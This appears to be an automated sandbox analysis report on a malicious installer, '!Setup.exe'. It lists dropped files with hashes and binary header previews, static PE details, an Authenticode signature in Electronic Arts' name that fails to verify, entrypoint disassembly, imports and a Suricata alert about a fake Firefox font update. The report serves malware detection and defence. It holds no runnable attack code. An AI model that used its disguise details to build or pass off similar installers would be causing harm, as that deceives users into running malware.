C:\Users\user\AppData\Local\Temp\Somehow

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	1727
Entropy (8bit):	4.763366808488679
Encrypted:	false
SSDEEP:	24:QyGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhB4+JvU+:59n9mTsCNvEQH5O5U1nPKrhBzM+
MD5:	F6279A0BB0D0473629398EC88715B89B
SHA1:	79BD172A2E7131AAC801D2C9F7BC200DC3B4E7D2
SHA-256:	01EFF6783F21201C497C486A527FA02B104B9848B5C224CB55946B37C6ECBFA0
SHA-512:	F8698A13102CF2648B6C94627E5D1BDCC2262D3EDB06049B8DECD0C51856FAF335D2D455BFFE3B4A0DFD97EB32972291918E416E943812BA1DF7A0D82213E92B
Malicious:	false
Preview:	surround........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Substances

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	VAX-order2 68k Blit mpx/mux executable
Category:	dropped
Size (bytes):	5537
Entropy (8bit):	7.628079910684769
Encrypted:	false
SSDEEP:	96:zzYGNG6m4/TOL+Q3IuzfJFFy4EDzHy5Xz+ppo+zAbQ6YhbBwGKGP5h3g:zcGNq4/C+Q3ISVSWMZMQ3rw
MD5:	54225374DB5D8752489F159F8FD02A35
SHA1:	3D4B0DA021BF71E37450F9BB75E1B8D322F40817
SHA-256:	D028F2445A203B30671235597D786DC8DED2EBC33F534E01D89893EC6DA6F55C
SHA-512:	A34F58B9D02523D138E9D4AB001FA2CC2F26AB7D098BF9BEF8CC4A942E16841BD0534E282D34E284C3BEDD50E6E90F6CE358C6A6227AFCF759CB6AA8D2D89A47
Malicious:	true
Preview:	........&https://www.globalsign.com/repository/0...U....0.0....+..........0..09..+.....0..-http://ocsp.globalsign.com/ca/gstsacasha384g40C..+.....0..7http://secure.globalsign.com/cacert/gstsacasha384g4.crt0...U.#..0......i...WE93..@...e.0A..U...:0806.4.2.0http://crl.globalsign.com/ca/gstsacasha384g4.crl0....H..............b...w/Bok...EY<.uz...o.#m-3Br.OD......L...]..$....h.Z.Ea.,.}...].........2.(.6...F-.~.@.".yag.....Of,.TX...N.u.T&.h..'.<..m0.&L.,.s....dJ{G.L....Qz.9.!......qp}..4..1....>6+f..A.#I"._.6.Z..P.?.NT......q.6<4......fJ.7..]z.>....=......gK...o..E]L..YZ.fsaE6J..cC.n.:.F9.t.s.^B../"l$'...Q....]....Au.d..........07b.Y.)rwiux....:\j..r...2.Yx.N..f..+...u...7..Au..?:....B..Q...z.+.L%.m.....OH...[...\.r`..7q..\I.L)m.W;..W....Ba.......\|.U..bd....UJo3...X.....<U!..{5y........U.$dta.+.6_V.....\|....0..Y0..A...........@...@]\|Gt0...*.H........0L1 0...U....GlobalSign Root CA - R61.0...U....GlobalSign1.0...U....GlobalSign0...180620000000Z..341210000000Z0[1.0...U.

C:\Users\user\AppData\Local\Temp\Tongue

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.998256996490452
Encrypted:	true
SSDEEP:	1536:Ebu3OTrw6jFq9gpo5aMywb2lt3BEWBp4hitzVkODPmlkbhk2conbb8BAD5vIkIZq:HOIaFqSo5T0lB68zRClMrVbbbD2kmq
MD5:	A8119033E21ADC168D928A23FD01A91D
SHA1:	B08C37528CA238FE311BED58802A77258C25DE54
SHA-256:	99E6AE3C080581B7382634FF281E9198E2D171E07BCCC38629593A71E7FB3715
SHA-512:	F4FCCCC3B6E5A2AEE63390213E62A400576EDFA4F7C420229919CB8597E8B7089D04AEAACD7CA5974D2BDBAB84CBDE6E81F2CA51AC524814A38FB13773FF4DE1
Malicious:	false
Preview:	..Hz.e...C...h.6.S&.a!.c..s ...oN.2.....kahCG...]..{.....5.%8Q.@.)...aV...E..}1...W".P..,eU......E.Z[.7...X.W.%QL.2F.\.....Q&T..2.%.?#..`x}N.daR..{..4..E=...E..<.2{,S.E9.G..h..d_.d+%>w..e..l. 7...Z.{.5.,!l...@...\h..8mX.e=>@..V.ym....[..3.[..(....p..M..~.5ew......1....N.6N.#.G).t."..).....&d3....%....p...FAn.'..O.... ...TS.%Q.F..8^...]..$~..o..Z.z....bTT...-....o.._{&..:..d!XN4...C..-....qf,.W..wu...9......_..Jr.[..t.8.....KKQ..~\|DpM&.V...v.<g......E_..[=.g.j.Si..:..C....~..>5.OXLqV!X..p...GY..Z......P..Y..?..........!.S.,.....w...s.f.Z..j.(p.[iF...6]h...>..pn<.........H..`.5..........2_.H.B..5oW.&_a._...7,...g....{...NI...I.x......k.0..&..R...fj.jF....#...!..\L.l(..B.=.&.u.6;........e\|t.._.F...N{..]l6.G....?.....5.z3...B.O...%..[....^3.K.Z.9p/w..K..d.n.h ...(3...y.R......=.6jo?e...F...........U@..._R...... >p).Zz4....#....+.j...Ir..-.........B.J/..f...D.S.<9cw......\|.....$2....M<...ht...34...b.o....(.%Y.(...K.6ZD.6....F.0u

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33mpu2a5.4ig.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovyexhev.run.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	6.53001282597034
Encrypted:	false
SSDEEP:	98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
MD5:	A62041070E18901131CBBE7825EC4EC7
SHA1:	67DB71F5A885B1E417B1272218E6B814C45A6C93
SHA-256:	E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
SHA-512:	AE560D59071F8E2D484E5607E6A3C6CAC52F011A6CB3F16B5EECB767F555D10A480AF32FE0BEB0DC6FF4B6BEC99B536AEBA58AD6697DAB72AAF60BD46F3BFC83
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-E1U3K.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-E1U3K.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-GVMHV.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-GVMHV.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	6.53001282597034
Encrypted:	false
SSDEEP:	98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
MD5:	A62041070E18901131CBBE7825EC4EC7
SHA1:	67DB71F5A885B1E417B1272218E6B814C45A6C93
SHA-256:	E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
SHA-512:	AE560D59071F8E2D484E5607E6A3C6CAC52F011A6CB3F16B5EECB767F555D10A480AF32FE0BEB0DC6FF4B6BEC99B536AEBA58AD6697DAB72AAF60BD46F3BFC83
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Roaming\UltraMedia\is-7SMCJ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1063239551
Entropy (8bit):	0.19795435725041813
Encrypted:	false
SSDEEP:
MD5:	C12ED31F29EF510393AE36661F44F102
SHA1:	2F00EEEA897AD851E65FE3A877D9B6380AEE484D
SHA-256:	8467A252F34645C19D8CDE87BBC4E214E81C58BB8D0376C67A43086222508CA0
SHA-512:	2075F2B500D65D8187470BA66EDFB268CE165F4841921F04629449CC62ED40D2D02FAE29CF0CA7C4DC7DDA925EA69E30C11E96042108B83899FF6150DBFC5CBD
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................N.........$.N.......N...@..........................P............@......@........................... Q..@....T..`............_?.)....Q.,N............................Q.....................................................CODE......N.......N................. ..`DATA..........N.......N.............@...BSS...........P......hP..................idata...@... Q..B...hP.............@....tls....0....pQ.......P..................rdata........Q.......P.............@..P.reloc.. N....Q..P....P.............@..P.rsrc....`....T..b....S.............@..P..............t.......s.............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1063239551
Entropy (8bit):	0.19795435725041813
Encrypted:	false
SSDEEP:
MD5:	C12ED31F29EF510393AE36661F44F102
SHA1:	2F00EEEA897AD851E65FE3A877D9B6380AEE484D
SHA-256:	8467A252F34645C19D8CDE87BBC4E214E81C58BB8D0376C67A43086222508CA0
SHA-512:	2075F2B500D65D8187470BA66EDFB268CE165F4841921F04629449CC62ED40D2D02FAE29CF0CA7C4DC7DDA925EA69E30C11E96042108B83899FF6150DBFC5CBD
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................N.........$.N.......N...@..........................P............@......@........................... Q..@....T..`............_?.)....Q.,N............................Q.....................................................CODE......N.......N................. ..`DATA..........N.......N.............@...BSS...........P......hP..................idata...@... Q..B...hP.............@....tls....0....pQ.......P..................rdata........Q.......P.............@..P.reloc.. N....Q..P....P.............@..P.rsrc....`....T..b....S.............@..P..............t.......s.............@..P........................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.206009117886892
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	!Setup.exe
File size:	73'410'647 bytes
MD5:	0981c44a10cc0831ff1223aa55383192
SHA1:	fc3f705cceb24d3265fe136707e1a4e497214975
SHA256:	14fbe2e9baff12e805e814228425975d57bbbeb16a2b3a1229c873871d97d803
SHA512:	278ddea959b1250efda3e659fdc2cd8c86b57fb8b36427eaf330a32cae6bfd9e8f05f65c82b9a31ad0cf0bdb92c961138dfebe38c4604dfd32691ab41a42cdc7
SSDEEP:	24576:alAeQ4IH5m/rRrUKMJgTwTwiJatG9kKmBkO27XXmJ:vp4IZm1rwJgSoGeKmj27XXmJ
TLSH:	98F712F77A38BA171B060F790607497292B984991061125EF0ADC9AE72FE7FC13D939C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

File Icon


Icon Hash:	f4fcfcecd89cdcd4

Static PE Info

General

Entrypoint:	0x4038af
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	04/05/2023 02:00:00 07/05/2026 01:59:59
Subject Chain	CN="Electronic Arts, Inc.", OU=EAC, O="Electronic Arts, Inc.", L=Redwood City, S=CALIFORNIA, C=US
Version:	3
Thumbprint MD5:	33BD4710688F5874BAC612E52BCCEEA8
Thumbprint SHA-1:	A46E87AEBD8693AE8B3B2F26449F8828368B4D4F
Thumbprint SHA-256:	0F952F3F6AF7C5B1FE753761AD34E2C360930EF530EB6A753AB461046F79C049
Serial:	0671352DC4C103B70AE725E954486374

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007F3F707EDDCBh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007F3F707EDAADh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007F3F707EDA9Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007F3F707EB39Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007F3F707ED771h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F3F707EB423h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F3F707EB39Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac40	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0xa132	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x45ffff7	0x2860
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x994	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x728c	0x7400	419d4e1be1ac35a5db9c47f553b27cea	False	0.6566540948275862	data	6.499708590628113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2b6e	0x2c00	cca1ca3fbf99570f6de9b43ce767f368	False	0.3678977272727273	data	4.497932535153822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x72b9c	0x200	77f0839f8ebea31040e462523e1c770e	False	0.279296875	data	1.8049406284608531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7f000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x100000	0xa132	0xa200	79bde46aeaffd342a7e7ec88264887af	False	0.9418885030864198	data	7.79735990009353	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10b000	0xfd6	0x1000	cddb8df34f1d9a0ee9a189a63df1152c	False	0.56787109375	data	5.31165953246566	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x100208	0x8633	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.0006112647358463
RT_ICON	0x10883c	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.7584244080145719
RT_DIALOG	0x109964	0x100	data	English	United States	0.5234375
RT_DIALOG	0x109a64	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x109b80	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x109be0	0x22	data	English	United States	0.9411764705882353
RT_VERSION	0x109c04	0x258	data	English	United States	0.51
RT_MANIFEST	0x109e5c	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T20:24:36.226362+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49744	104.21.89.250	443	TCP
